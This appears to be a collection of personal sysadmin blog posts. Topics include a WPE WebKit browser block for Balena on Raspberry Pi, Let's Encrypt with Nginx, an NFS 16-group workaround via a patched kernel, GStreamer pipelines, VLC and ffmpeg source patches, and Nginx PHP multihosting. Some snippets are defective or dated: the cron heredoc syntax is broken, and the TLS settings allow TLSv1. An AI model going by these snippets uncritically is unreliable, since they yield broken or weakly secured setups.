A new Balena Browser Block based on WPE WebKit is here

TL;DR: The balena-browser-wpe has been released. This is the result of using the WPE WebKit browser as the chosen web engine for the Balena Browser block. This opens a lot of doors for all kinds of things, really lowering the bar to checking out and exploring an official WPE build with Balena’s very convenient system (more below).


It is my pleasure to announce the public release of the new Balena Browser Block based on WPE WebKit (balena-browser-wpe). This was completed by a close collaboration between Igalia and Balena developers, and was several months in the making. It was made possible in large part by the decision to use the WPE WebKit browser as the web engine for the Balena Browser block. Thanks to everyone involved for making it happen!

As a quick introduction for those who don’t know what Balena is or what they do, Balena.io is a well-known company due to being authors of balenaEtcher, the open-source utility widely used for flashing disk images onto storage media to create live SD cards and USB flash drives. But for some time now, they have been working on what they call Balena Cloud, a complete open-source stack of tools, images and services for deploying IoT services.


Why you could be interested on continuing reading this post?

You might find this news especially interesting if:

  • You are interested in building a Balena project using the new Linux graphical stack based on Wayland.
  • You are looking for a browser solution with a very low memory footprint. This block is intended to be usable as an easy and fast evaluation channel for the WPE WebKit web rendering engine for embedded platforms.
  • You are looking for a fully open ecosystem with standardized specifications for your project.
  • You are optimizing your project for RaspberryPi 3 and RaspberryPi 4.

… and, specifically about WebKit, if:

  • You are interested in a platform that uses the latest stable versions of WPE WebKit available.
  • You are interested in playing with the experimental features for WPE WebKit.
  • You are looking for a WPE WebKit solution using the WPE Freedesktop (FDO) backend (wpebackend-fdo).
  • You are looking for a WPE WebKit solution using the Yocto meta-webkit recipes to build the binary images.

The Balena Cloud , as I introduced before, is a complete set of tools for building, deploying, and managing IoT services on connected Linux devices. Balena is already providing service currently for around a half-million connected devices via the Balena Cloud. What I find especially interesting is that every Fleet (Balena’s term for a collection of devices) hosted on the Balena Cloud is running on a full open-source stack, from the OS flashed in the devices to the applications running on the top of the OS.

Another service they provide in this ecosystem is the Balena Hub, a catalog of IoT and edge projects created by a community. In this catalog you can find other reusable blocks or projects that you can reuse or adapt to build your own Balena project. The idea is that you can connect blocks like a kind of Lego so you can chose a X server, and then connect a dashboard, later a browser and so … In summary, in this Balena ecosystem you can find:

  • Blocks:
    • Drop-in chunk of functionality built to handle the basics.
    • Defined as an Docker image (Dockerfiledocker-compose.yml).
  • Projects:
    • Allows you to design your services in a plug&play way by using blocks.
    • Source code of a Fleet (forkeable).
  • Fleets (== Applications):
    • Groups of devices running the same code for a specific task.
    • It can be private or public.

Coming back to initial point, what we are announcing here is two new Balena blocks that they will be part of the Balena Hub: 1) the balena-browser-wpe block and 2) the balena-weston block.

The design of the balena-browser-wpe block comes with significant innovations with respect to the Balena Browser, (balena-browser) which makes it significantly different from the former block. For example, contrary to other balena-browser, what uses a Chromium browser via the classical X11 Linux graphical system, the new balena-browser-wpe block provides a hardware accelerated web browser display based on WPE WebKit on the top of the new Linux graphical stack, Wayland, using the Weston compositor system.

Also WPE WebKit allows embedders to create simple and performant systems based on Web platform technologies. It is a WebKit port designed with flexibility and hardware acceleration in mind, leveraging common 3D graphics APIs for best performance.

Block diagram of the Balena Browser WPE project

Another important difference is that this project is intended to run entirely on a fully open graphical stack for the Raspberry Pi. That means the use of the Mesa VC4 graphics driver instead of the proprietary Broadcom driver for Raspberry Pi.

The Raspberry Pi Broadcom VideoCore 4 GPU (Graphical Processing Unit) is a OpenGL ES 2.0 3D and GLES 2.0 compatible engine. The closed source graphics stack runs on VC4 GPU and talks to V3D and display component using proprietary protocols. Instead of this, the Mesa VC4 driver provides the open-source implementation of open standards: the OpenGL (Open graphics Library), Vulkan and other graphics API specification (e.g: GLES2).

Finally, the API for interacting with GPU is enabled with the Mesa VC4 driver and provides, through Mesa, the access to to DRM (Direct Rendering Manager) subsystem of the Linux kernel responsible for interfacing with the GPU and the DMA Buffer Sharing Framework required for a efficient buffer export mechanism required by the Wayland compositor 🚀.

How can I start to play with the Balena Browser WPE?

This is the enjoyable part of the article. Balena provides many of the pieces that you will need, at least, from the point of view of the software (the hardware still has to be supplied by you 🙃). From Balena you will get:

  • The Balena OS, a downloadable OS image where the blocks will be executed in the top of this base system as isolated containers.
  • The Balena Hub, a source repository for the projects to run in the top of Balena Cloud.
  • and the Balena Cloud, a container-based platform for deploying IoT applications over all the connected devices.

Additional requirements are the sources for the blocks that we provide:

  • The Balena WPE project, the reference project for building all of the required Balena blocks for running the WPE WebKit browser.
  • The Balena Browser WPE block source code.
  • The Balena Weston block source code.

To get the Balena Browser WPE project working on your Raspberry Pi 3 or 4, begin by following the Getting started guide. Once you reach the Running your first Container section, use the balena-wpe Github URL of the repository instead of the one provided. For example: git clone https://github.com/balenalabs/multicontainer-getting-started.git -> git clone https://github.com/Igalia/balena-wpe.git

Last but not least …

… now that the sources of the project are public, I intend to keep publishing short posts explaining in detail what I consider the relevant features of this project are. We also intend to create a public Balena Fleet based in this project. Personally, I think this it could be a nice and easy way to familiarize yourself with the Balena Browser WPE project, for those just getting started.

That’s all for now! I hope you will enjoy this contribution. More things are coming soon.

Let’s encrypt!

“The Let’s Encrypt project aims to make encrypted connections to World Wide Web servers ubiquitous. By getting rid of payment, web server configuration, validation emails, and dealing with expired certificates it is meant to significantly lower the complexity of setting up and maintaining TLS encryption.”Wikipedia

Let’s Encrypt is a service provided by the Internet Security Research Group (ISRG), a public benefit organization. Major sponsors are the Electronic Frontier Foundation (EFF), the Mozilla Foundation, Akamai, and Cisco Systems. Other partners include the certificate authority IdenTrust, the University of Michigan (U-M), the Stanford Law School, the Linux Foundation as well as Stephen Kent from Raytheon/BBN Technologies and Alex Polvi from CoreOS.

So, in summary, with Let’s Encrypt you will be able to request for a valid SSL certificate, free of charges, issued for a recognized CA and avoiding the mess of the mails, requests, forms typical of the webpages of the classic CA issuers.

The rest of the article shows the required steps needed for a complete setup of a Nginx server using Let’s encrypt issued certificates:

Install letsencrypt setup scripts:

cd /usr/local/sbin
sudo wget https://dl.eff.org/certbot-auto
sudo chmod a+x /usr/local/sbin/certbot-auto

Preparing the system for it:

sudo mkdir /var/www/letsencrypt
sudo chgrp www-data /var/www/letsencrypt

A special directory must be accesible for certificate issuer:

root /var/www/letsencrypt/;
location ~ /.well-known {
allow all;
}

Service restart. Let’s encrypt will be able to access to this domain and verify the athenticity of the request:

sudo service nginx restart

Note: At this point you need a valid A DNS entry pointing to the nginx server host. In my example, I will use the mydomain.com domain as an example.

Requesting for a valid certificate for my domain:

sudo certbot-auto certonly -a webroot --webroot-path=/var/www/letsencrypt -d mydomain.com

If everything is ok, you will get a valid certificate issued for your domain:

/etc/letsencrypt/live/mydomain.com/fullchain.pem

You will need a Diffie-Hellman PEM file for the crypthographic key exchange:

sudo openssl dhparam -out /etc/ssl/certs/dhparam.pem 2048

Setting the nginx virtual host with SSL as usual but using the Let’s encrypt issued certificate:

...
ssl on;
ssl_certificate /etc/letsencrypt/live/mydomain.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/mydomain.com/privkey.pem;

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
ssl_prefer_server_ciphers on;
ssl_dhparam /etc/ssl/certs/dhparam.pem;
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 5m;

add_header Strict-Transport-Security "max-age=31536000; includeSubDomains";
...

Check the new configuration and restarting the Nginx:

nginx -t
sudo service nginx restart

Renewing the issued certitificate:

cat >> EOF > /etc/cron.d/letsencrypt
30 2 * * 1 root /usr/local/sbin/certbot-auto renew >> /var/log/le-renew.log
35 2 * * 1 root /etc/init.d/nginx reload
EOF

The NFS 16 groups limit issue

The last Friday I was involved in a curious situation trying to setup a NFS server. The NFS server was mounted in UNIX server which was using UNIX users accounts assigned to many groups. These users were using files and directories stored in the NFS server.

As brief description of the situación which incites this post, I will say that the problem occurs when you are using UNIX users which are assigned in more than 16 UNIX groups. In this scenario, if you are using NFS (whatever version) with the UNIX system authentication (AUTH_SYS), quite common nowadays in spite of the security recommendations, you will get a permission denied during the access to certain arbitrary files and directories. The reason is that the list of secondary groups assigned to the user is truncated by the AUTH_SYS implementation. That is simple amazing!

Well, to be honest, this is not an unknown NFS problem. This limitation is here, around us, since the early stages of the modern computing technology. After a quick search on Internet, I found the reason why this happens and it is not a NFS limitation but it is a limit specified on AUTH_SYS:

   The client may wish to identify itself, for example, as it is
   identified on a UNIX(tm) system.  The flavor of the client credential
   is "AUTH_SYS".  The opaque data constituting the credential encodes
   the following structure:

         struct authsys_parms {
            unsigned int stamp;
            string machinename<255>;
            unsigned int uid;
            unsigned int gid;
            unsigned int gids<16>;
         };

The root cause

AUTH_SYS is the historical method which is used by client programs contacting an RPC server need. This allows the server get information about how the client should be able to access, and what functions should be allowed. Without authentication, any client on the network that can send packets to the RPC server could access any function.

AUTH_SYS has been in use for years in many systems just because it was the first authentication method available but AUTH_SYS is not a secure authentication method nowadays. In AUTH_SYS, the RPC client sends the UNIX UID and GIDs for the user, the server implicitly trusts that the user is who the user claims to be. All the this information is sent through the network without any kind of encryption and authentication, so it is high vulnerable.

In consequence, AUTH_SYS is an insecure security mode. The result is this can be used as the proverbial open lock on a door. Overall  the technical articles about these matters highly suggest the usage of other alternatives like NFSv4 (even NFSv3) and Kerberos, but  yet AUTH_SYS is commonly used within companies, so we must still deal it.

Note: This article didn’t focus in security issues. The main purpose of this article is describe a specific situation and show the possible alternatives identified during the troubleshooting of the issue.

Taking up the thread …

I was profiling a situation where the main issue was leaded by a UNIX secondary groups list truncation. Before continue, some summary of the context here: A UNIX user has a primary group, defined in the passwd database, but can also be a member of many other groups, defined in the group database. A UNIX system hardcoded  a limit of 16 groups that a user can be a member of (source). This means that clients into UNIX groups only be able to access to 16 groups. Quite poor when you deal with dozens and dozens of groups.

As we already know, the problem is focused in the NFS fulfilment with the AUTH_SYS specifications, which has an in-kernel data structure where the groups a user has access to is hardcoded as an array of 16 identifiers (gids). Even though Linux now supports 65536 groups, it is still not possible to operate on more than 16 from userland.

My scenario …

at this moment, I had identified this same situation in my case. I had users assigned to more than 16 secondary groups, I had a service using a NFS for the data storage but, in addition, I had some more extra furnitures in the room:

  • Users of the service are actual UNIX accounts. The authorization to for the file accessing is delegated to the own UINIX system
  • I hadn’t got a common LDAP server sharing the uids and gids
  • The NFS service wasn’t under my control

; this last point turned my case a little bit more miserable as we will see later.

 Getting information from Internet …

first of all, a brief analysis of the situation is always welcome:

– What is the actual problem? This problem occurs when a user, who is a member of more than 16 groups, tries to access a file or directory on an nfs mount that depends on his group rights in order to be authorized to see it.  Isn’t it?
– Yes!
– So, whatever thing that you do should be starting by asking on Google. If the issue was present for all those years, the solution should be also present.
– Good idea! – I told concluding the dialog with myself.

After a couple of minutes I had a completed list of articles, mail archives, forums and blog posts which throw up all kind of information about the problem. All of them talked about the most of the points introduced up to this point in this article. More or less interesting each one, one of them sticked out respect the others. It was the solving-the-nfs-16-group-limit-problem posted article from the xkyle.com blog.

The solving-the-nfs-16-group-limit-problem article describes a similar situation and offers it own conclusions. I must admit that I am pretty aligned with these conclusions and I would recommend this post for a deep reading.

The silver bullet

This solution is the best case. If you have the control of the NFS and you are running a Linux kernel 2.6.21 at least. This kernel or newer supports a NFS feature with allows ignore the gids sent by the RPC operations, instead of uses the local gids assigned to the uid from the local server:

-g or --manage-gids
Accept requests from the kernel to map user id numbers into lists of group id numbers for use in access control. An NFS request will normally (except when using Kerberos or other cryptographic authentication) contains a user-id and a list of group-ids. Due to a limitation in the NFS protocol, at most 16 groups ids can be listed. If you use the -g flag, then the list of group ids received from the client will be replaced by a list of group ids determined by an appropriate lookup on the server. Note that the 'primary' group id is not affected so a newgroup command on the client will still be effective. This function requires a Linux Kernel with version at least 2.6.21.

The key for this solution is get synchronized the ids between the client and the server. A common solution for this last requirement it is a common Name Service Switch (NSS) service. Therefore, the --manage-gids option allows the NFS server to ignore the information sent by the client and check the groups directly with the information stored into a LDAP or whatever using by the NSS. For this case, the NFS server and the NFS client must share the UIDs and GIDs.

That is the suggested approaching suggested in solving-the-nfs-16-group-limit-problem. Unfortunately, it was not my case :-(.

But not in my case

In my case, I had no way for synchronize the ids of the client with the ids of the NFS server. In my situation the ids in the client server was obtained from a Postgres database added in the NSS as one of the backends, there was not any chance to use these backend for the NFS server.

The solution

But this was not the end. Fortunately, the nfs-ngroups patchs developed by frankvm@frankvm.com expand the variable length list from 16-bit to 32-bit numeric supplemental group identifiers. As he says in the README file:

This patch is useful when users are member of more than 16 groups on a Linux NFS client. The patch bypasses this protocol imposed limit in a compatible manner (i.e. no server patching).

That was perfect! It was that I was looking for exactly. So I had to build a custom kernel patched with the right patch in the server under my control and voilá!:

wget https://cdn.kernel.org/pub/linux/kernel/v3.x/linux-3.10.101.tar.xz
wget http://www.frankvm.com/nfs-ngroups/3.10-nfs-ngroups-4.60.patch
tar -xf linux-3.10.101.tar.xz</code><code>
cd linux-3.10.101/
patch &lt; ../3.10-nfs-ngroups-4.60.patch
make oldconfig
make menuconfig
make rpm
rpm -i /root/rpmbuild/RPMS/x86_64/kernel-3.10.101-4.x86_64.rpm
dracut "initramfs-3.10.101.img" 3.10.101
grub2-mkconfig &gt; /boot/grub2/grub.cfg

Steps for CentOS, based on these three documents: [1] [2] [3]

Conclusions

As I said this post doesn’t make focus in the security stuffs. AUTH_SYS is a solution designed for the previous times before Internet. Nowadays, the total interconnection of the computer networks discourages the usage of kind methods like AUTH_SYS. It is an authentication method too much naive in the present.

Anyway, the NFS services are still quite common and many of them are still deployed with AUTH_SYS, not Kerberos or other intermediate solutions.  This post is about a specific situation in one of these deployments. Even if these services should be progressively replaced by other more secure solutions, a sysadmin should demand practical feedback about the particularities of these legacy systems.

Knowledge about the NFS 16 secondary groups limit and the different recognized workaround are still interesting from the point of view of the know-how. This post shows two solutions, even three if you consider the Kerberos choice, to fix this issue … just one of them fulfill with my requirements in my particular case.

New revision of redmine-cmd released

Yesterday, I decided spend some of my time in a tinny tool created for me one year and half ago. This tool was named redmine-cmd and, obviously, the purpose of this tool is the usage of the Redmine ticketing system directly from the console system but also auto-submit the time expended in each task automatically.

The tool was functional with Redmine <=1.2 until now but it didn’t implement all the API definition covered  by the latest versins of Redmine. The reason of that it was bacause the places where I was using this tool had not been upgraded to the latest version of Redmine for years. One of the consecuences of this was that many API/REST ending points was not be available for my tool in those early Redmine enviroments, therefore some relevant values related to a Redmine’s issue as the tracker id, the activity id or the issue status code wasn’t available to be obtained from the server causing, these restrictions,  weird things like the definition of  enumerators in the redmine-cmd configuration file with the same values that in the server.

 

redmine-cmd console example
redmine-cmd console example

But it’s a new time today, the time come down and the last Redmine with a version < 2.2 is not anymore  around me so,  yesterday, finally I decided end the integration with the Redmine API using the ending points required by my tool to get dinamically all the data required from the server:

The final implemantion is already available on PIP public repositories with MIT license to be used for everybody. The usage is quite trivial and the installation and setup steps are documented int the README file. Please, download and use it, any feedback will be welcome.

Extenal link: https://github.com/psaavedra/redmine-cmd

Using Gstreamer with OpenMax in a Raspberry Pi

This minipost shows a subgroup of commands tested in a Raspberry Pi to evaluate the possibilities of a usage of this hardware as a domestic TV Headend.

  • From UDP/TS source with video MPEG2 to another UDP multicast group transcoding the video
    stream with H264:gst-launch-1.0 -v  udpsrc uri=udp://239.123.123.3:1234 ! tsdemux ! queue ! mpegvideoparse ! omxmpeg2videodec ! videoconvert ! omxh264enc ! video/x-h264,stream-format=byte-stream,profile=high ! h264parse ! mpegtsmux ! udpsink host=239.123.124.3 port=1234 auto-multicast=true

    The Gstreamer pipeline doesn’t break/end but there is a bug in the h264parse: it sends not regularly the needed SPS / PPS information with it (http://www.raspberrypi.org/forums/viewtopic.php?f=70&t=59412). Then, resulting stream is only playable if you get the stream from the beginning.

  • From UDP/TS source with video MPEG2 and MP2 to another UDP multicast group transcoding the video stream with H264 and video with AAC:
    gst-launch-1.0 -v udpsrc uri=udp://239.123.123.1:1234 ! queue ! tsdemux name=dem \
    dem. ! queue ! mpegvideoparse ! mpeg2dec ! videoconvert ! omxh264enc control-rate=1 target-bitrate=1000000 ! video/x-h264,stream-format=byte-stream,profile=high ! h264parse config-interval=2 ! queue ! muxer. \
    dem. ! queue ! mpegaudioparse ! mpg123audiodec ! audioconvert ! faac ! queue ! muxer. \
    flvmux name=muxer ! queue ! rtmpsink location="rtmp://rtmp.server:1935/rtmp/test2 live=test2"

    The Gstreamer pipeline breaks for some unkknown reason.

  • From UDP/TS source with video MPEG2 to a RTMP server transcoding to H264:
    gst-launch-1.0 -v udpsrc uri=udp://239.123.123.1:1234 ! queue ! tsdemux name=dem \
    dem. ! queue ! mpegvideoparse ! mpeg2dec ! videoconvert ! omxh264enc control-rate=1 target-bitrate=1000000 ! video/x-h264,stream-format=byte-stream,profile=high ! h264parse config-interval=2 ! queue ! muxer. \
    flvmux name=muxer ! queue ! rtmpsink location="rtmp://rtmp.server:1935/rtmp/test2 live=test2"

    Works fine and smooth. Source is a MPEG/TS SD channel.

  • From UDP/TS source with audio MP2 to a RTMP server transcoding audio channel to AAC:
    gst-launch-1.0 -v udpsrc uri=udp://239.123.123.1:1234 ! queue ! tsdemux name=dem \
    dem. ! queue ! mpegaudioparse ! mpg123audiodec ! audioconvert ! faac ! queue ! muxer. \
    flvmux name=muxer ! queue ! rtmpsink location="rtmp://rtmp.server:1935/rtmp/test2 live=test2"

    Works fine and smooth.

Hide the VLC cone icon in the browser-plugin-vlc for Linux (Mozilla or Webkit) (Debian way)

vlc
VideoLAN’s fu***ng cone

The next instructions describes how to proceed to hide the VLC cone icon in the VLC plugin for Web browsers. I think this tip can be useful for another ninjas in so far as there is not a lot of information on Internet which describes this. Instructions are based on the Debian way and use the Debian/DPKG tools but I guess that the example is far enough explicit to be extrapolated to other environments.

Requirements:

  • You need to install all the build-dependences for the browser-plugin-vlc before execute dpkg-buildpackage -rfakeroot

Steps:

  • apt-get source browser-plugin-vlc
  • cd npapi-vlc-2.0.0/
  • edit npapi/vlcplugin_gtk.cp and replace the code as follows:
    --- npapi-vlc-2.0.0.orig/npapi/vlcplugin_gtk.cpp
    +++ npapi-vlc-2.0.0/npapi/vlcplugin_gtk.cpp
    @@ -46,12 +46,13 @@ VlcPluginGtk::VlcPluginGtk(NPP instance,
         vol_slider_timeout_id(0)
     {
         memset(&video_xwindow, 0, sizeof(Window));
    -    GtkIconTheme *icon_theme = gtk_icon_theme_get_default();
    -    cone_icon = gdk_pixbuf_copy(gtk_icon_theme_load_icon(
    -                    icon_theme, "vlc", 128, GTK_ICON_LOOKUP_FORCE_SIZE, NULL));
    -    if (!cone_icon) {
    -        fprintf(stderr, "WARNING: could not load VLC icon\n");
    -    }
    +    cone_icon = NULL;
     }
     
     VlcPluginGtk::~VlcPluginGtk()
    
  • dpkg-source –commit
  • dpkg-buildpackage -rfakeroot
  • cd ../
  • ls browser-plugin-vlc_2.0.0-2_amd64.deb

Installation:

  • dpkg -i browser-plugin-vlc_2.0.0-2_amd64.deb

Disabling a site-wide action on Django

If you need to disable a site-wide action you can call AdminSite.disable_action().
admin.site.disable_action(‘delete_selected’) (See: Django reference guide)

… or

def get_actions(self, request):
  actions = super(ApplicationAdmin, self).get_actions(request)
  if 'delete_selected' in actions:
    del actions['delete_selected']
  return actions

, for a specific ModelAdmin.

Automated multihosting with Nginx for PHP with FastCGI

Nginx configuration for this:

  • if client request does not have x_forwarded_for, deny the request showing a 404
  • allow access site even if x_forwarded_for:
  • if “Host” header is a IP use /var/www/vhosts/ip as root dir
  • if “Host” header is a domain use /var/www/vhosts/$domain as root dir
  • if “Host” is sub0.sub1.oranything.domain still goes to /home/vhosts/$domain
  • backend for PHP fastcgi
  • if requested file doesnt exist throw 404 error
  • setting the default index page

Strongly based on http://kbeezie.com/view/nginx/

server {

server_name www.example.com default_server;
listen 0.0.0.0:80;

# Keep a root path in the server level, this will help automatically fill
# Information for stuff like FastCGI Parameters
root /var/www/vhosts/;

# You can set access and error logs at http, server and location level
access_log /var/log/nginx/server.access.log;
error_log /var/log/nginx/server.error.log debug;

# if client request does not have x_forwarded_for, deny the request,
if ($http_x_forwarded_for = "" ) { set $x 1; }
# .. except if host is www.public1.com|www.public2.com
if ($host ~* "(www\.public1\.com|www\.public2\.com)" ) { set $x 0; }
# .. or if uri is publicdir
if ($uri ~* "(publicdir)" ) { set $x 0; }
# .. evaluating $x
if ($x = 1) { return 404; }

# if Host is a IP vhost is "ip"
if ($host ~* "(\d+)\.(\d+)\.(\d+)\.(\d+)" ) { set $vhost "ip"; }

# if Host is a DN vhost is the vhost
if ($host ~* "(\w+\.)*(\w+)\.([a-z]+)" ) { set $vhost "$2.$3"; }

# If file doesnt exist: Error 404
if (!-e $document_root/$vhost/$uri) { return 403; }

# Setting the index page
set $i "/index.html";
if (-e $document_root/$vhost/index.php) { set $i "/index.php"; }
if (-e $document_root/$vhost/index.htm) { set $i "/index.htm"; }
if ($uri ~* "(.*)/") {
rewrite ^(.*)(/)$ $1$i redirect;
}
if (-d $document_root/$vhost/$uri) {
rewrite ^(.*)$ $1$i redirect;
}

# It will try for static file, folder, then falls back to index.php
# Assuming index.php is capable of parsing the URI automatically
location / {
try_files /$vhost$uri /$vhost/index.php ;
}

# Prevent ".." navigations: Error 403
location ~ \..*/.*\.php$ {
return 403;
}

# This block will catch static file requests, such as images, css, js
# The ?: prefix is a 'non-capturing' mark, meaning we do not require
# the pattern to be captured into $1 which should help improve performance
location ~* \.(?:ico|css|js|gif|jpe?g|png)$ {
# Some basic cache-control for static files to be sent to the browser
expires max;
add_header Pragma public;
add_header Cache-Control "public, must-revalidate, proxy-revalidate";
}

# PHP location block and parameters
location ~ \.php {
if (!-e $document_root/$vhost/$uri) { return 404; }
fastcgi_param QUERY_STRING $query_string;
fastcgi_param REQUEST_METHOD $request_method;
fastcgi_param CONTENT_TYPE $content_type;
fastcgi_param CONTENT_LENGTH $content_length;

fastcgi_param SCRIPT_NAME $fastcgi_script_name;
fastcgi_param SCRIPT_FILENAME $document_root/$vhost/$fastcgi_script_name;
fastcgi_param REQUEST_URI $request_uri;
fastcgi_param DOCUMENT_URI $document_uri;
fastcgi_param DOCUMENT_ROOT $document_root;
fastcgi_param SERVER_PROTOCOL $server_protocol;

fastcgi_param GATEWAY_INTERFACE CGI/1.1;
fastcgi_param SERVER_SOFTWARE nginx;

fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REMOTE_PORT $remote_port;
#fastcgi_param SERVER_ADDR $server_addr;
fastcgi_param SERVER_ADDR $remote_addr;
fastcgi_param SERVER_PORT $server_port;
fastcgi_param SERVER_NAME $server_name;
fastcgi_param HTTP_HOST $host;

fastcgi_connect_timeout 60;
fastcgi_send_timeout 180;
fastcgi_read_timeout 180;
fastcgi_buffer_size 128k;
fastcgi_buffers 8 256k;
fastcgi_busy_buffers_size 256k;
fastcgi_temp_file_write_size 256k;
fastcgi_intercept_errors on;

# I use a socket for php, tends to be faster
# for TCP just use 127.0.0.1:port#
# fastcgi_pass unix:/opt/php-fpm.sock;
fastcgi_pass 127.0.0.1:9000;

# Not normally needed for wordpress since you are
# sending everything to index.php in try_files
# this tells it to use index.php when the url
# ends in a trailing slash such as domain.com/
fastcgi_index index.php;
}

# Most sites won't have configured favicon or robots.txt
# and since its always grabbed, turn it off in access log
# and turn off it's not-found error in the error log
location = /favicon.ico { access_log off; log_not_found off; }
location = /robots.txt { access_log off; log_not_found off; }

# Rather than just denying .ht* in the config, why not deny
# access to all .invisible files
location ~ /\. { deny all; access_log off; log_not_found off; }
}

Tips about FFserver & FFmpeg

FFmpeg

Today, I want to share one tip about ffmpeg and ffserver multimedia video tools and  server. FFmpeg is a open source project that produces libraries and programs for handling multimedia data. FFserver is a HTTP and RTSP multimedia streaming server for live broadcasts. It can also time shift live broadcast.

All the settings used in this article have been tested on AMD64 Debian Squeeze OS using
FFmpeg Debian packages of the Debian-Multimedia repositories:

ffmpeg 5:0.6.1+svn20101128-0.2

You can get the Debian Multimedia repositories adding this lines to your APT sources.list
file:

deb http://www.debian-multimedia.org squeeze main
deb-src http://www.debian-multimedia.org squeeze main

Note that, with this same version, I’ve observe a problem trying to run ffserver:

Mon Apr 25 13:29:09 2011 Aspect ratio mismatch between encoder and muxer layer

To work ffserver in this version of ffmpeg is neccesary to hack the source code:

    1. Install DPKG development tools:  apt-get install dpkg-dev
    2. Get sources: apt-get source ffmpeg
    3. Go to sources directory: cd ffmpeg-dmo-0.6.1+svn20101128/
    4. Apply the patch:
      Index: libavutil/rational.h
      ===================================================================
      --- libavutil/rational.h    (revision 25549)
      +++ libavutil/rational.h    (working copy)
      @@ -29,7 +29,6 @@
      #define AVUTIL_RATIONAL_H
      
      #include <stdint.h>
      -#include <limits.h>
      #include "attributes.h"
      
      /**
      @@ -44,16 +43,13 @@
      * Compare two rationals.
      * @param a first rational
      * @param b second rational
      - * @return 0 if a==b, 1 if a>b, -1 if a<b, and INT_MIN if one of the
      - * values is of the form 0/0
      + * @return 0 if a==b, 1 if a>b and -1 if a<b
      */
      static inline int av_cmp_q(AVRational a, AVRational b){
      const int64_t tmp= a.num * (int64_t)b.den - b.num * (int64_t)a.den;
      
      if(tmp) return ((tmp ^ a.den ^ b.den)>>63)|1;
      -    else if(b.den && a.den) return 0;
      -    else if(a.num && b.num) return (a.num>>31) - (b.num>>31);
      -    else                    return INT_MIN;
      +    else    return 0;
      }
      
      /**
  • Install all the dependences neccesaries to build the package:
    apt-get install  debhelper libmp3lame-dev zlib1g-dev libvorbis-dev libsdl-dev libfaac-dev quilt texi2html libxvidcore4-dev liblzo2-dev libx264-dev  libtheora-dev libgsm1-dev ccache libbz2-dev libxvmc-dev libdc1394-22-dev libdirac-dev   libschroedinger-dev libspeex-dev yasm libopenjpeg-dev libopencore-amrwb-dev libvdpau-dev libopencore-amrnb-dev libxfixes-dev libasound-dev libva-dev libjack-dev libvpx-dev  librtmp-dev doxygen
  • Build the packages: dpkg-buildpackage -rfakeroot
  • Finally you’ll have the new *deb packages:
    # ls ../*.deb
    ffmpeg_0.6.1+svn20101128-0.2_amd64.deb         libavfilter-dev_0.6.1+svn20101128-0.2_amd64.deb
    ffmpeg-dbg_0.6.1+svn20101128-0.2_amd64.deb     libavformat52_0.6.1+svn20101128-0.2_amd64.deb
    ffmpeg-doc_0.6.1+svn20101128-0.2_all.deb     libavformat-dev_0.6.1+svn20101128-0.2_amd64.deb
    libavcodec52_0.6.1+svn20101128-0.2_amd64.deb     libavutil50_0.6.1+svn20101128-0.2_amd64.deb
    libavcodec-dev_0.6.1+svn20101128-0.2_amd64.deb     libavutil-dev_0.6.1+svn20101128-0.2_amd64.deb
    libavcore0_0.6.1+svn20101128-0.2_amd64.deb     libpostproc51_0.6.1+svn20101128-0.2_amd64.deb
    libavcore-dev_0.6.1+svn20101128-0.2_amd64.deb     libpostproc-dev_0.6.1+svn20101128-0.2_amd64.deb
    libavdevice52_0.6.1+svn20101128-0.2_amd64.deb     libswscale0_0.6.1+svn20101128-0.2_amd64.deb
    libavdevice-dev_0.6.1+svn20101128-0.2_amd64.deb  libswscale-dev_0.6.1+svn20101128-0.2_amd64.deb
    libavfilter1_0.6.1+svn20101128-0.2_amd64.deb

After to install the ffmpeg packages, you’ll can to run ffserver adjusted like you want. for this aim, you can run as follow: ffserver -f your_ffserver_settings.conf. The ffserver configuration file should have this structuration:

  • Main settings:
     # Port on which the server is listening. You must select a different
     # port from your standard HTTP web server if it is running on the same
     # computer.
     Port 8090
     # Address on which the server is bound. Only useful if you have
     # several network interfaces.
     BindAddress 0.0.0.0
     RTSPPort 554
     RTSPBindAddress 0.0.0.0
     # Number of simultaneous HTTP connections that can be handled. It has
     # to be defined *before* the MaxClients parameter, since it defines the
     # MaxClients maximum limit.
     MaxHTTPConnections 2000
     # Number of simultaneous requests that can be handled. Since FFServer
     # is very fast, it is more likely that you will want to leave this high
     # and use MaxBandwidth, below.
     MaxClients 1000
     # This the maximum amount of kbit/sec that you are prepared to
     # consume when streaming to clients.
     MaxBandwidth 1000
     # Access log file (uses standard Apache log file format)
     # '-' is the standard output.
     CustomLog -
     # Suppress that if you want to launch ffserver as a daemon.
     NoDaemon
  • Definition of the live feeds. Each live feed contains one video and/or audio sequence coming from an ffmpeg encoder or another ffserver. This sequence may be encoded simultaneously with several codecs at several resolutions. You must use ffmpeg to send a live feed to ffserver. In this example, you can type ffmpeg http://localhost:8090/feed1.ffm  or ffmpeg   -f alsa   -i hw:1   -f video4linux2 -r 25 -s 352x288  -i /dev/video0   http://localhost:8090/feed1.ffm:
     ################################################################################
     <Feed feed1.ffm>
     # ffserver can do time shifting. It means that it can stream any
     # previously recorded live stream. The request should contain:
     # "http://xxxx?date=[YYYY-MM-DDT][[HH:]MM:]SS[.m...]".You must specify
     # a path where the feed is stored on disk. You also specify the
     # maximum size of the feed, where zero means unlimited. Default:
     # File=/tmp/feed_name.ffm FileMaxSize=5M
     File /tmp/feed1.ffm
     FileMaxSize 100M
     # You could specify
     # ReadOnlyFile /saved/specialvideo.ffm
     # This marks the file as readonly and it will not be deleted or updated.
     # Specify launch in order to start ffmpeg automatically.
     # First ffmpeg must be defined with an appropriate path if needed,
     # after that options can follow, but avoid adding the http:// field
     # Launch ffmpeg
     # Only allow connections from localhost to the feed.
     ACL allow 127.0.0.1
     </Feed>
  • Setting a RTSP/RTP stream:
     ################################################################################
     # It's a lot of important the .sdp extension to allow RTP working well.
     #
     # Note that AVOptionVideo is only interesting for libx264 video codec:
     # For RTSP:
     # ffplay  rtsp://10.121.55.148:554/live.sdp
     #
     # For SDP (RTP):
     #   vlc  http://10.121.55.148:8090/live.sdp
     #
     <Stream live.sdp>
     Format rtp
     Feed feed1.ffm
     ### MulticastAddress 224.124.0.1
     ### MulticastPort 5000
     ### MulticastTTL 16
     # NoLoop
     VideoSize 352x288
     VideoFrameRate 15
     VideoBitRate 200
